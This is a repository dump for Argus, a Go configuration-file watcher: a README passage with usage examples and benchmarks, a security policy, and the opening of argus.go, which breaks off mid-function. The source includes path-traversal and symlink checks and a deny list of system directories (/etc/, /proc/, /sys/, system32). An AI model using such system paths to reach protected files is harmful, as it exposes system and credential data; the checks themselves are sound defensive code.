- **Remote Config**: Distributed configuration with automatic fallback (Remote → Local). Currently available providers: [HashiCorp Consul](https://github.com/agilira/argus-provider-consul), [Redis](https://github.com/agilira/argus-provider-redis), and [GitOps](https://github.com/agilira/argus-provider-git), with more to come.
- **Graceful Shutdown**: Timeout-controlled shutdown for Kubernetes and production deployments
- **OpenTelemetry Ready**: Async tracing and metrics with zero contamination of core library
- **Type-Safe Binding**: Zero-reflection configuration binding with fluent API (1.6M ops/sec)
- **Adaptive Optimization**: Four strategies (SingleEvent, SmallBatch, LargeBatch, Auto) 
- **Unified Audit System**: SQLite-based cross-application correlation with JSONL fallback
- **Scalable Monitoring**: Handle 1-1000+ files simultaneously with linear performance

## Compatibility and Support

Argus is designed for Go 1.24+ environments and follows Long-Term Support guidelines to ensure consistent performance across production deployments.

## Installation

```bash
go get github.com/agilira/argus
```

## Quick Start

### Multi-Source Configuration Loading
```go
import "github.com/agilira/argus"

// Load with automatic precedence: ENV vars > File > Defaults
config, err := argus.LoadConfigMultiSource("config.yaml")
if err != nil {
    log.Fatal(err)
}

watcher := argus.New(*config)
```
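The precedence chain above can be illustrated with a small stand-alone sketch (the `resolve` helper below is purely illustrative, not Argus's internal API): environment variables win over file values, which win over defaults.

```go
package main

import (
	"fmt"
	"os"
)

// resolve applies the ENV > file > default precedence for a single key.
// envKey is the environment variable name, fileVals a parsed config map.
func resolve(envKey, key string, fileVals map[string]string, def string) string {
	if v, ok := os.LookupEnv(envKey); ok {
		return v // highest precedence: environment variable
	}
	if v, ok := fileVals[key]; ok {
		return v // next: value from the config file
	}
	return def // lowest: compiled-in default
}

func main() {
	file := map[string]string{"database.host": "db.internal"}
	// With APP_DATABASE_HOST unset, the file value "db.internal" wins.
	fmt.Println(resolve("APP_DATABASE_HOST", "database.host", file, "localhost"))
}
```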

### Type-Safe Configuration Binding
```go
// Ultra-fast zero-reflection binding (1.6M ops/sec)
var (
    dbHost     string
    dbPort     int
    enableSSL  bool
    timeout    time.Duration
)

err := argus.BindFromConfig(parsedConfig).
    BindString(&dbHost, "database.host", "localhost").
    BindInt(&dbPort, "database.port", 5432).
    BindBool(&enableSSL, "database.ssl", true).
    BindDuration(&timeout, "database.timeout", 30*time.Second).
    Apply()
```

### Real-Time Configuration Updates
```go
// Watch any configuration format - auto-detected
watcher, err := argus.UniversalConfigWatcher("config.yaml", 
    func(config map[string]interface{}) {
        fmt.Printf("Config updated: %+v\n", config)
    })
if err != nil {
    log.Fatal(err)
}

watcher.Start()
defer watcher.Stop()
```

### Remote Configuration
```go
// Distributed configuration with automatic fallback
remoteManager := argus.NewRemoteConfigWithFallback(
    "https://consul.internal:8500/v1/kv/app/config",  // Primary
    "https://backup-consul.internal:8500/v1/kv/app/config", // Fallback
    "/etc/myapp/fallback.json", // Local fallback
)

watcher := argus.New(argus.Config{
    Remote: remoteManager.Config(),
})

// Graceful shutdown for Kubernetes deployments
defer watcher.GracefulShutdown(30 * time.Second)
```

### CLI Usage
```bash
# Ultra-fast configuration management CLI
argus config get config.yaml server.port
argus config set config.yaml database.host localhost
argus config convert config.yaml config.json
argus watch config.yaml --interval=1s
```
**[Orpheus CLI Integration →](./docs/cli-integration.md)** - Complete CLI documentation and examples

## Performance

Engineered for production environments with sustained monitoring and minimal overhead:

### Benchmarks
```
Configuration Monitoring:      12.10 ns/op     (99.999% efficiency)
Format Auto-Detection:         2.79 ns/op      (universal format support)
JSON Parsing (small):          1,712 ns/op     (616 B/op, 16 allocs/op)
JSON Parsing (large):          7,793 ns/op     (3,064 B/op, 86 allocs/op)
Event Processing:              25.51 ns/op     (BoreasLite single event, CPU-efficient)
Write Operations:              10.15 ns/op     (Ultra-fast file event writing)
vs Go Channels:                5.6x faster     (10.31 ns vs 57.62 ns/op)
CLI Command Parsing:             512 ns/op     (3 allocs/op, Orpheus framework)
```
**Test BoreasLite ring buffer performance**:
```bash
cd benchmarks && go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem
```
See [isolated benchmarks](./benchmarks/) for detailed ring buffer performance analysis.

**Scalability (Setup Performance):**
```
File Count    Setup Time    Strategy Used
   50 files    11.92 μs/file  SmallBatch
  500 files    23.95 μs/file  LargeBatch
 1000 files    38.90 μs/file  LargeBatch
```
*Detection rate: 100% across all scales*

## Architecture

Argus provides intelligent configuration management through polling with a lock-free stat cache (12.10 ns monitoring overhead) and ultra-fast format detection (2.79 ns per operation).

**[Complete Architecture Guide →](./docs/architecture.md)**
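The lock-free stat cache mentioned above follows the copy-on-write `atomic.Pointer` pattern: readers never take a lock, and the single polling goroutine publishes a fresh map on each update. A self-contained sketch (deliberately simplified relative to Argus's internals):

```go
package main

import (
	"fmt"
	"sync/atomic"
)

type stat struct{ size int64 }

// statCache publishes an immutable map via atomic.Pointer: reads are
// lock-free, writes copy-modify-swap a new map.
type statCache struct {
	m atomic.Pointer[map[string]stat]
}

func newStatCache() *statCache {
	c := &statCache{}
	empty := make(map[string]stat)
	c.m.Store(&empty)
	return c
}

func (c *statCache) get(path string) (stat, bool) {
	s, ok := (*c.m.Load())[path] // lock-free read
	return s, ok
}

func (c *statCache) set(path string, s stat) {
	old := *c.m.Load()
	next := make(map[string]stat, len(old)+1)
	for k, v := range old { // copy-on-write
		next[k] = v
	}
	next[path] = s
	c.m.Store(&next) // atomic publish of the new snapshot
}

func main() {
	c := newStatCache()
	c.set("config.yaml", stat{size: 512})
	s, _ := c.get("config.yaml")
	fmt.Println(s.size) // 512
}
```

Note that this sketch assumes a single writer; concurrent writers would need a mutex or CAS loop around `set`.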


### Parser Support

Built-in parsers are optimized for rapid deployment; full specification compliance is available via plugins.

> **Advanced Features**: Complex configurations requiring full spec compliance should use plugin parsers via `argus.RegisterParser()`. See [docs/parser-guide.md](docs/parser-guide.md) for details.
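The plugin mechanism follows the usual Go registry pattern. The sketch below illustrates it with a hypothetical registry and parser interface; Argus's actual `RegisterParser` signature is documented in the parser guide.

```go
package main

import (
	"fmt"
	"strings"
)

// Parser is a hypothetical interface standing in for a plugin parser.
type Parser interface {
	Parse(data []byte) (map[string]interface{}, error)
	Supports(ext string) bool
}

var parsers []Parser // package-level registry

// registerParser appends a plugin parser to the registry.
func registerParser(p Parser) { parsers = append(parsers, p) }

// lookup returns the first registered parser claiming the extension.
func lookup(ext string) (Parser, bool) {
	for _, p := range parsers {
		if p.Supports(ext) {
			return p, true
		}
	}
	return nil, false
}

// kvParser is a toy "key = value" parser used as an example plugin.
type kvParser struct{}

func (kvParser) Supports(ext string) bool { return ext == ".kv" }
func (kvParser) Parse(data []byte) (map[string]interface{}, error) {
	out := make(map[string]interface{})
	for _, line := range strings.Split(string(data), "\n") {
		if k, v, ok := strings.Cut(line, "="); ok {
			out[strings.TrimSpace(k)] = strings.TrimSpace(v)
		}
	}
	return out, nil
}

func main() {
	registerParser(kvParser{})
	p, _ := lookup(".kv")
	cfg, _ := p.Parse([]byte("host = localhost"))
	fmt.Println(cfg["host"]) // localhost
}
```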


## Core Framework

### ConfigWriter System
Atomic configuration file management with type-safe operations across all supported formats:

```go
// Create writer with automatic format detection
writer, err := argus.NewConfigWriter("config.yaml", argus.FormatYAML, config)
if err != nil {
    return err
}

// Type-safe value operations (zero allocations)
writer.SetValue("database.host", "localhost")
writer.SetValue("database.port", 5432)
writer.SetValue("debug", true)

// Atomic write to disk
if err := writer.WriteConfig(); err != nil {
    return err
}

// Query operations
host := writer.GetValue("database.host")      // 30ns, 0 allocs
keys := writer.ListKeys("database")           // Lists all database.* keys
exists := writer.DeleteValue("old.setting")   // Removes key if exists
```

### Configuration Binding

```go
// Ultra-fast configuration binding - zero reflection
var (
    dbHost     string
    dbPort     int
    enableSSL  bool
    timeout    time.Duration
)

err := argus.BindFromConfig(config).
    BindString(&dbHost, "database.host", "localhost").
    BindInt(&dbPort, "database.port", 5432).
    BindBool(&enableSSL, "database.ssl", true).
    BindDuration(&timeout, "database.timeout", 30*time.Second).
    Apply()

// Variables are now populated and ready to use!
```

**Performance**: 1,645,489 operations/second with a single allocation per bind

**[Full API Reference →](./docs/api-reference.md)**


## Observability & Integrations

Professional OTEL tracing integration with zero core dependency pollution:

```go
// Clean separation: core Argus has no OTEL dependencies
auditLogger, _ := argus.NewAuditLogger(argus.DefaultAuditConfig())

// Optional OTEL wrapper (only when needed)
tracer := otel.Tracer("my-service")
wrapper := NewOTELAuditWrapper(auditLogger, tracer)

// Use either logger or wrapper seamlessly
wrapper.LogConfigChange("/etc/config.json", oldConfig, newConfig)
```

**[Complete OTEL Integration Example →](./examples/otel_integration/)**

## The Philosophy Behind Argus

Argus Panoptes was no ordinary guardian. While others slept, he watched. While others blinked, his hundred eyes remained ever vigilant. Hera chose him not for his strength, but for something rarer—his ability to see everything without ever growing weary.

The giant understood that true protection came not from reactive force, but from constant, intelligent awareness. His vigilance was not frantic or wasteful—each eye served a purpose, each moment of watching was deliberate.

When Zeus finally overcame the great guardian, Hera honored Argus by placing his hundred eyes upon the peacock's tail, ensuring his watchful spirit would endure forever.

### Unified Audit Configuration
```go
// Unified SQLite audit (recommended for cross-application correlation)
config := argus.DefaultAuditConfig()  // Uses unified SQLite backend

// Legacy JSONL audit (for backward compatibility)
jsonlConfig := argus.AuditConfig{
    Enabled:    true,
    OutputFile: filepath.Join(os.TempDir(), "argus-audit.jsonl"), // .jsonl = JSONL backend
    MinLevel:   argus.AuditInfo,
}

// Explicit unified SQLite configuration
sqliteConfig := argus.AuditConfig{
    Enabled:    true,
    OutputFile: "",  // Empty = unified SQLite backend
    MinLevel:   argus.AuditCritical,
}
```
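Backend selection is driven by `OutputFile`, following the convention shown above: empty selects the unified SQLite backend, a `.jsonl` extension selects the legacy JSONL backend. A simplified decision helper under those assumptions (illustrative only, not the library's actual code; the fallback for other extensions is an assumption):

```go
package main

import (
	"fmt"
	"strings"
)

// auditBackend picks a backend name from the configured output file:
// empty → unified SQLite, *.jsonl → legacy JSONL.
func auditBackend(outputFile string) string {
	switch {
	case outputFile == "":
		return "sqlite" // unified cross-application backend
	case strings.HasSuffix(outputFile, ".jsonl"):
		return "jsonl" // legacy line-delimited JSON audit log
	default:
		return "sqlite" // assumption: other paths use the unified backend
	}
}

func main() {
	fmt.Println(auditBackend(""))            // sqlite
	fmt.Println(auditBackend("audit.jsonl")) // jsonl
}
```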

## Documentation

**Quick Links:**
- **[Quick Start Guide](./docs/quick-start.md)** - Get running in 2 minutes
- **[Orpheus CLI Integration](./docs/cli-integration.md)** - Complete CLI documentation and examples
- **[API Reference](./docs/api-reference.md)** - Complete API documentation  
- **[Audit System](./docs/audit-system.md)** - Comprehensive audit and compliance guide
- **[Examples](./examples/)** - Production-ready configuration patterns

## License

Argus is licensed under the [Mozilla Public License 2.0](./LICENSE.md).

---

Argus • an AGILira fragment


## /SECURITY.md

# Security Policy

## Reporting a Vulnerability

We greatly value the efforts of the community in identifying and responsibly disclosing security vulnerabilities. Your contributions help us ensure the safety and reliability of our software.

If you have discovered a vulnerability in one of our products or have security concerns regarding AGILira software, please contact us at **security@agilira.com**.

To help us address your report effectively, please include the following details:

- **Steps to Reproduce**: A clear and concise description of how to reproduce the issue or a proof-of-concept.
- **Relevant Tools**: Any tools used during your investigation, including their versions.
- **Tool Output**: Logs, screenshots, or any other output that supports your findings.

For more information about AGILira's security practices, please visit our [Security Page](https://agilira.one/security).

Thank you for helping us maintain a secure and trustworthy environment for all users.

---

Argus • an AGILira fragment

## /argus.go

```go path="/argus.go" 
// argus: Ultra-lightweight configuration watcher with BoreasLite ultra-fast ring buffer
//
// Philosophy:
// - Minimal dependencies (AGILira ecosystem only: go-errors, go-timecache)
// - Polling-based approach for maximum OS portability
// - Intelligent caching to minimize os.Stat() syscalls (like go-timecache)
// - Thread-safe atomic operations
// - Zero allocations in hot paths
// - Configurable polling intervals
//
// Example Usage:
//   watcher := argus.New(argus.Config{
//       PollInterval: 5 * time.Second,
//       CacheTTL:     2 * time.Second,
//   })
//
//   watcher.Watch("config.json", func(event argus.ChangeEvent) {
//       // Handle configuration change
//       newConfig, err := LoadConfig(event.Path)
//       if err == nil {
//           atomicLevel.SetLevel(newConfig.Level)
//       }
//   })
//
//   watcher.Start()
//   defer watcher.Stop()
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"context"
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"sync"
	"sync/atomic"
	"time"

	"github.com/agilira/go-errors"
	"github.com/agilira/go-timecache"
)

// fileStat caches file metadata to minimize os.Stat() calls
// Using value types instead of pointers to avoid use-after-free in concurrent access

// Error codes for Argus operations
const (
	ErrCodeInvalidConfig          = "ARGUS_INVALID_CONFIG"
	ErrCodeFileNotFound           = "ARGUS_FILE_NOT_FOUND"
	ErrCodeWatcherStopped         = "ARGUS_WATCHER_STOPPED"
	ErrCodeWatcherBusy            = "ARGUS_WATCHER_BUSY"
	ErrCodeRemoteConfigError      = "ARGUS_REMOTE_CONFIG_ERROR"
	ErrCodeConfigNotFound         = "ARGUS_CONFIG_NOT_FOUND"
	ErrCodeInvalidPollInterval    = "ARGUS_INVALID_POLL_INTERVAL"
	ErrCodeInvalidCacheTTL        = "ARGUS_INVALID_CACHE_TTL"
	ErrCodeInvalidMaxWatchedFiles = "ARGUS_INVALID_MAX_WATCHED_FILES"
	ErrCodeInvalidOptimization    = "ARGUS_INVALID_OPTIMIZATION"
	ErrCodeInvalidAuditConfig     = "ARGUS_INVALID_AUDIT_CONFIG"
	ErrCodeInvalidBufferSize      = "ARGUS_INVALID_BUFFER_SIZE"
	ErrCodeInvalidFlushInterval   = "ARGUS_INVALID_FLUSH_INTERVAL"
	ErrCodeInvalidOutputFile      = "ARGUS_INVALID_OUTPUT_FILE"
	ErrCodeUnwritableOutputFile   = "ARGUS_UNWRITABLE_OUTPUT_FILE"
	ErrCodeCacheTTLTooLarge       = "ARGUS_CACHE_TTL_TOO_LARGE"
	ErrCodePollIntervalTooSmall   = "ARGUS_POLL_INTERVAL_TOO_SMALL"
	ErrCodeMaxFilesTooLarge       = "ARGUS_MAX_FILES_TOO_LARGE"
	ErrCodeBoreasCapacityInvalid  = "ARGUS_INVALID_BOREAS_CAPACITY"
	ErrCodeConfigWriterError      = "ARGUS_CONFIG_WRITER_ERROR"
	ErrCodeSerializationError     = "ARGUS_SERIALIZATION_ERROR"
	ErrCodeIOError                = "ARGUS_IO_ERROR"
)

// ChangeEvent represents a file change notification
type ChangeEvent struct {
	Path     string    // File path that changed
	ModTime  time.Time // New modification time
	Size     int64     // New file size
	IsCreate bool      // True if file was created
	IsDelete bool      // True if file was deleted
	IsModify bool      // True if file was modified
}

// UpdateCallback is called when a watched file changes
type UpdateCallback func(event ChangeEvent)

// ErrorHandler is called when errors occur during file watching or parsing
// It receives the error and the file path where the error occurred
type ErrorHandler func(err error, filepath string)

// OptimizationStrategy defines how BoreasLite should optimize performance
type OptimizationStrategy int

const (
	// OptimizationAuto automatically chooses the best strategy based on file count
	// - 1-3 files: SingleEvent strategy (ultra-low latency)
	// - 4-20 files: SmallBatch strategy (balanced)
	// - 21+ files: LargeBatch strategy (high throughput)
	OptimizationAuto OptimizationStrategy = iota

	// OptimizationSingleEvent optimizes for 1-2 files with ultra-low latency
	// - Fast path for single events (24ns)
	// - Minimal batching overhead
	// - Aggressive spinning for immediate processing
	OptimizationSingleEvent

	// OptimizationSmallBatch optimizes for 3-20 files with balanced performance
	// - Small batch sizes (2-8 events)
	// - Moderate spinning with short sleeps
	// - Good balance between latency and throughput
	OptimizationSmallBatch

	// OptimizationLargeBatch optimizes for 20+ files with high throughput
	// - Large batch sizes (16-64 events)
	// - Zephyros-style 4x unrolling
	// - Focus on maximum throughput over latency
	OptimizationLargeBatch
)

// Config configures the Argus watcher behavior
type Config struct {
	// PollInterval is how often to check for file changes
	// Default: 5 seconds (good balance of responsiveness vs overhead)
	PollInterval time.Duration

	// CacheTTL is how long to cache os.Stat() results
	// Should be <= PollInterval for effectiveness
	// Default: PollInterval / 2
	CacheTTL time.Duration

	// MaxWatchedFiles limits the number of files that can be watched
	// Default: 100 (generous for config files)
	MaxWatchedFiles int

	// Audit configuration for security and compliance
	// Default: Enabled with secure defaults
	Audit AuditConfig

	// ErrorHandler is called when errors occur during file watching/parsing
	// If nil, errors are logged to stderr (backward compatible)
	// Example: func(err error, path string) { metrics.Increment("config.errors") }
	ErrorHandler ErrorHandler

	// OptimizationStrategy determines how BoreasLite optimizes performance
	// - OptimizationAuto: Automatically choose based on file count (default)
	// - OptimizationSingleEvent: Ultra-low latency for 1-2 files
	// - OptimizationSmallBatch: Balanced for 3-20 files
	// - OptimizationLargeBatch: High throughput for 20+ files
	OptimizationStrategy OptimizationStrategy

	// BoreasLiteCapacity sets the ring buffer size (must be power of 2)
	// - Auto/SingleEvent: 64 (minimal memory)
	// - SmallBatch: 128 (balanced)
	// - LargeBatch: 256+ (high throughput)
	// Default: 0 (auto-calculated based on strategy)
	BoreasLiteCapacity int64

	// Remote configuration with automatic fallback capabilities
	// When enabled, provides distributed configuration management with local fallback
	// Default: Disabled for backward compatibility
	Remote RemoteConfig
}

// RemoteConfig defines distributed configuration management with automatic fallback.
// This struct enables enterprise-grade remote configuration loading with resilient
// fallback capabilities for production deployments where configuration comes from
// distributed systems (Consul, etcd, Redis) but local fallback is required.
//
// The RemoteConfig system implements the following fallback sequence:
// 1. Attempt to load from PrimaryURL (e.g., consul://prod-consul/myapp/config)
// 2. On failure, attempt FallbackURL if configured (e.g., consul://backup-consul/myapp/config)
// 3. On complete remote failure, load from FallbackPath (e.g., /etc/myapp/fallback-config.json)
// 4. Continue with SyncInterval for automatic recovery when remote systems recover
//
// Zero-allocation design: All URLs and paths are pre-parsed and cached during
// initialization to avoid allocations during runtime operations.
//
// Production deployment patterns:
//
//	// Consul with local fallback (recommended)
//	Remote: RemoteConfig{
//	    Enabled:      true,
//	    PrimaryURL:   "consul://prod-consul:8500/config/myapp",
//	    FallbackPath: "/etc/myapp/config.json",
//	    SyncInterval: 30 * time.Second,
//	    Timeout:      10 * time.Second,
//	}
//
//	// Multi-datacenter setup with remote fallback
//	Remote: RemoteConfig{
//	    Enabled:      true,
//	    PrimaryURL:   "consul://dc1-consul:8500/config/myapp",
//	    FallbackURL:  "consul://dc2-consul:8500/config/myapp",
//	    FallbackPath: "/etc/myapp/emergency-config.json",
//	    SyncInterval: 60 * time.Second,
//	}
//
//	// Redis with backup Redis
//	Remote: RemoteConfig{
//	    Enabled:     true,
//	    PrimaryURL:  "redis://prod-redis:6379/0/myapp:config",
//	    FallbackURL: "redis://backup-redis:6379/0/myapp:config",
//	    SyncInterval: 15 * time.Second,
//	}
//
// Thread safety: RemoteConfig operations are thread-safe and can be called
// concurrently from multiple goroutines without external synchronization.
//
// Error handling: Failed remote loads automatically trigger fallback sequence.
// Applications receive the most recent successful configuration and error notifications
// through the standard ErrorHandler mechanism.
//
// Monitoring integration: All remote configuration operations generate audit events
// for monitoring, alerting, and compliance tracking in production environments.
type RemoteConfig struct {
	// Enabled controls whether remote configuration loading is active
	// Default: false (for backward compatibility)
	// When false, all other RemoteConfig fields are ignored
	Enabled bool `json:"enabled" yaml:"enabled" toml:"enabled"`

	// PrimaryURL is the main remote configuration source
	// Supports all registered remote providers (consul://, redis://, etcd://, http://, https://)
	// Examples:
	//   - "consul://prod-consul:8500/config/myapp?datacenter=dc1"
	//   - "redis://prod-redis:6379/0/myapp:config"
	//   - "etcd://prod-etcd:2379/config/myapp"
	//   - "https://config-api.company.com/api/v1/config/myapp"
	// Required when Enabled=true
	PrimaryURL string `json:"primary_url" yaml:"primary_url" toml:"primary_url"`

	// FallbackURL is an optional secondary remote configuration source
	// Used when PrimaryURL fails but before falling back to local file
	// Should typically be a different instance/datacenter of the same system
	// Examples:
	//   - "consul://backup-consul:8500/config/myapp"
	//   - "redis://backup-redis:6379/0/myapp:config"
	// Optional: can be empty to skip remote fallback
	FallbackURL string `json:"fallback_url,omitempty" yaml:"fallback_url,omitempty" toml:"fallback_url,omitempty"`

	// FallbackPath is a local file path used when all remote sources fail
	// This provides the ultimate fallback for high-availability deployments
	// The file should contain a valid configuration in JSON, YAML, or TOML format
	// Examples:
	//   - "/etc/myapp/emergency-config.json"
	//   - "/opt/myapp/fallback-config.yaml"
	//   - "./config/local-fallback.toml"
	// Recommended: Always configure for production deployments
	FallbackPath string `json:"fallback_path,omitempty" yaml:"fallback_path,omitempty" toml:"fallback_path,omitempty"`

	// SyncInterval controls how often to check for remote configuration updates
	// This applies to all remote sources (primary and fallback)
	// Shorter intervals provide faster updates but increase system load
	// Default: 30 seconds (good balance for most applications)
	// Production considerations:
	//   - High-frequency apps: 10-15 seconds
	//   - Standard apps: 30-60 seconds
	//   - Batch jobs: 5+ minutes
	SyncInterval time.Duration `json:"sync_interval" yaml:"sync_interval" toml:"sync_interval"`

	// Timeout controls the maximum time to wait for each remote configuration request
	// Applied to both primary and fallback URL requests
	// Should be shorter than SyncInterval to allow for fallback attempts
	// Default: 10 seconds (allows for network latency and processing)
	// Production recommendations:
	//   - Local network: 5-10 seconds
	//   - Cross-datacenter: 10-20 seconds
	//   - Internet-based: 20-30 seconds
	Timeout time.Duration `json:"timeout" yaml:"timeout" toml:"timeout"`

	// MaxRetries controls retry attempts for failed remote requests
	// Applied per URL (primary/fallback) before moving to next fallback level
	// Default: 2 (total of 3 attempts: initial + 2 retries)
	// Higher values increase reliability but also increase latency during failures
	MaxRetries int `json:"max_retries" yaml:"max_retries" toml:"max_retries"`

	// RetryDelay is the base delay between retry attempts
	// Uses exponential backoff: attempt N waits RetryDelay * 2^N
	// Default: 1 second (results in 1s, 2s, 4s... delays)
	// Should be balanced with Timeout to ensure retries fit within timeout window
	RetryDelay time.Duration `json:"retry_delay" yaml:"retry_delay" toml:"retry_delay"`
}

// fileStat represents cached file statistics for efficient os.Stat() caching.
// Uses value types and timecache for zero-allocation performance optimization.
type fileStat struct {
	modTime  time.Time // Last modification time from os.Stat()
	size     int64     // File size in bytes
	exists   bool      // Whether the file exists
	cachedAt int64     // Use timecache nano timestamp for zero-allocation timing
}

// isExpired checks if the cached stat is expired using timecache for zero-allocation timing
func (fs *fileStat) isExpired(ttl time.Duration) bool {
	now := timecache.CachedTimeNano()
	return (now - fs.cachedAt) > int64(ttl)
}

// watchedFile represents a file under observation with its callback and cached state.
// Optimized for minimal memory footprint and fast access during polling.
type watchedFile struct {
	path     string         // Absolute file path being watched
	callback UpdateCallback // User-provided callback for file changes
	lastStat fileStat       // Cached file statistics for change detection
}

// Watcher monitors configuration files for changes
// ULTRA-OPTIMIZED: Uses BoreasLite MPSC ring buffer + lock-free cache for maximum performance
type Watcher struct {
	config  Config
	files   map[string]*watchedFile
	filesMu sync.RWMutex

	// LOCK-FREE CACHE: Uses atomic.Pointer for zero-contention reads
	statCache atomic.Pointer[map[string]fileStat]

	// ZERO-ALLOCATION POLLING: Reusable slice to avoid allocations in pollFiles
	filesBuffer []*watchedFile

	// BOREAS LITE: Ultra-fast MPSC ring buffer for file events (DEFAULT)
	eventRing *BoreasLite

	// AUDIT SYSTEM: Comprehensive security and compliance logging
	auditLogger *AuditLogger

	running   atomic.Bool
	stopped   atomic.Bool // Tracks if explicitly stopped vs just not started
	stopCh    chan struct{}
	stoppedCh chan struct{}
	ctx       context.Context
	cancel    context.CancelFunc
}

// New creates a new Argus file watcher with BoreasLite integration
func New(config Config) *Watcher {
	cfg := config.WithDefaults()
	ctx, cancel := context.WithCancel(context.Background())

	// Initialize audit logger
	auditLogger, err := NewAuditLogger(cfg.Audit)
	if err != nil {
		// Fallback to disabled audit if setup fails
		auditLogger, _ = NewAuditLogger(AuditConfig{Enabled: false})
	}

	watcher := &Watcher{
		config:      *cfg,
		files:       make(map[string]*watchedFile),
		auditLogger: auditLogger,
		stopCh:      make(chan struct{}),
		stoppedCh:   make(chan struct{}),
		ctx:         ctx,
		cancel:      cancel,
	}

	// Initialize lock-free cache
	initialCache := make(map[string]fileStat)
	watcher.statCache.Store(&initialCache)

	// Initialize BoreasLite MPSC ring buffer with configured strategy
	watcher.eventRing = NewBoreasLite(
		watcher.config.BoreasLiteCapacity,
		watcher.config.OptimizationStrategy,
		watcher.processFileEvent,
	)

	return watcher
}

// processFileEvent processes events from the BoreasLite ring buffer
// This method is called by BoreasLite for each file change event
func (w *Watcher) processFileEvent(fileEvent *FileChangeEvent) {
	// CRITICAL: Panic recovery to prevent callback panics from crashing the watcher
	defer func() {
		if r := recover(); r != nil {
			w.auditLogger.LogFileWatch("callback_panic", string(fileEvent.Path[:]))
		}
	}()

	// Convert BoreasLite event back to standard ChangeEvent
	event := ConvertFileEventToChangeEvent(*fileEvent)

	// Find the corresponding watched file and call its callback
	w.filesMu.RLock()
	if wf, exists := w.files[event.Path]; exists {
		// Call the user's callback function
		wf.callback(event)

		// Log basic file change to audit system
		w.auditLogger.LogFileWatch("file_changed", event.Path)
	}
	w.filesMu.RUnlock()
}

// Watch adds a file to the watch list
func (w *Watcher) Watch(path string, callback UpdateCallback) error {
	if callback == nil {
		return errors.New(ErrCodeInvalidConfig, "callback cannot be nil")
	}

	// Check if watcher was explicitly stopped (not just not started)
	if w.stopped.Load() {
		return errors.New(ErrCodeWatcherStopped, "cannot add watch to stopped watcher")
	}

	// Validate and secure the path
	absPath, err := w.validateAndSecurePath(path)
	if err != nil {
		return err
	}

	// AUDIT: Log file watch start
	w.auditLogger.LogFileWatch("watch_start", absPath)

	return w.addWatchedFile(absPath, callback)
}

// validateAndSecurePath validates path security and returns absolute path
func (w *Watcher) validateAndSecurePath(path string) (string, error) {
	// SECURITY FIX: Validate path before processing to prevent path traversal attacks
	if err := ValidateSecurePath(path); err != nil {
		// AUDIT: Log security event for path traversal attempt
		w.auditLogger.LogSecurityEvent("path_traversal_attempt", "Rejected malicious file path",
			map[string]interface{}{
				"rejected_path": path,
				"reason":        err.Error(),
			})
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "invalid or unsafe file path").
			WithContext("path", path)
	}

	absPath, err := filepath.Abs(path)
	if err != nil {
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "invalid file path").
			WithContext("path", path)
	}

	// SECURITY: Double-check absolute path after resolution
	if err := ValidateSecurePath(absPath); err != nil {
		w.auditLogger.LogSecurityEvent("path_traversal_attempt", "Rejected malicious absolute path",
			map[string]interface{}{
				"rejected_path": absPath,
				"original_path": path,
				"reason":        err.Error(),
			})
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "resolved path is unsafe").
			WithContext("absolute_path", absPath).
			WithContext("original_path", path)
	}

	// SECURITY: Check for symlink traversal attacks
	// If the path is a symlink, verify that its target is also safe
	if info, err := os.Lstat(absPath); err == nil && info.Mode()&os.ModeSymlink != 0 {
		target, err := filepath.EvalSymlinks(absPath)
		if err != nil {
			// If we can't resolve the symlink target, reject it for security
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink target resolution failed",
				map[string]interface{}{
					"symlink_path": absPath,
					"reason":       err.Error(),
				})
			return "", errors.Wrap(err, ErrCodeInvalidConfig, "cannot resolve symlink target").
				WithContext("symlink_path", absPath)
		}

		// Validate the symlink target
		if err := ValidateSecurePath(target); err != nil {
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink points to dangerous target",
				map[string]interface{}{
					"symlink_path": absPath,
					"target_path":  target,
					"reason":       err.Error(),
				})
			return "", errors.Wrap(err, ErrCodeInvalidConfig, "symlink target is unsafe").
				WithContext("symlink_path", absPath).
				WithContext("target_path", target)
		}

		// Update absPath to the resolved target for consistency
		absPath = target
	}

	// Additional symlink validation: also covers symlinks in intermediate
	// path components, which the final-component Lstat check above misses
	if err := w.validateSymlinks(absPath, path); err != nil {
		return "", err
	}

	return absPath, nil
}

// validateSymlinks checks symlink security
func (w *Watcher) validateSymlinks(absPath, originalPath string) error {
	// SECURITY: Symlink resolution check
	// Resolve any symlinks and validate the final target path
	realPath, err := filepath.EvalSymlinks(absPath)
	if err == nil && realPath != absPath {
		// Path contains symlinks - validate the resolved target
		if err := ValidateSecurePath(realPath); err != nil {
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink points to unsafe location",
				map[string]interface{}{
					"symlink_path":  absPath,
					"resolved_path": realPath,
					"original_path": originalPath,
					"reason":        err.Error(),
				})
			return errors.Wrap(err, ErrCodeInvalidConfig, "symlink target is unsafe").
				WithContext("symlink_path", absPath).
				WithContext("resolved_path", realPath).
				WithContext("original_path", originalPath)
		}

		// Additional check: ensure symlink doesn't escape to system directories
		if w.isSystemDirectory(realPath) {
			w.auditLogger.LogSecurityEvent("symlink_system_access", "Symlink attempts to access system directory",
				map[string]interface{}{
					"symlink_path":  absPath,
					"resolved_path": realPath,
					"original_path": originalPath,
				})
			return errors.New(ErrCodeInvalidConfig, "symlink target accesses restricted system directory").
				WithContext("symlink_path", absPath).
				WithContext("resolved_path", realPath)
		}
	}
	return nil
}

// isSystemDirectory reports whether path points to a restricted system directory.
// All checks use the lowercased path so case variations cannot bypass them on
// case-insensitive file systems.
func (w *Watcher) isSystemDirectory(path string) bool {
	lowerPath := strings.ToLower(path)
	return strings.HasPrefix(lowerPath, "/etc/") ||
		strings.HasPrefix(lowerPath, "/proc/") ||
		strings.HasPrefix(lowerPath, "/sys/") ||
		strings.HasPrefix(lowerPath, "/dev/") ||
		strings.Contains(lowerPath, "windows\\system32") ||
		strings.Contains(lowerPath, "program files")
}

// addWatchedFile adds the file to watch list with proper locking
func (w *Watcher) addWatchedFile(absPath string, callback UpdateCallback) error {
	w.filesMu.Lock()
	defer w.filesMu.Unlock()

	if len(w.files) >= w.config.MaxWatchedFiles {
		// AUDIT: Log security event for limit exceeded
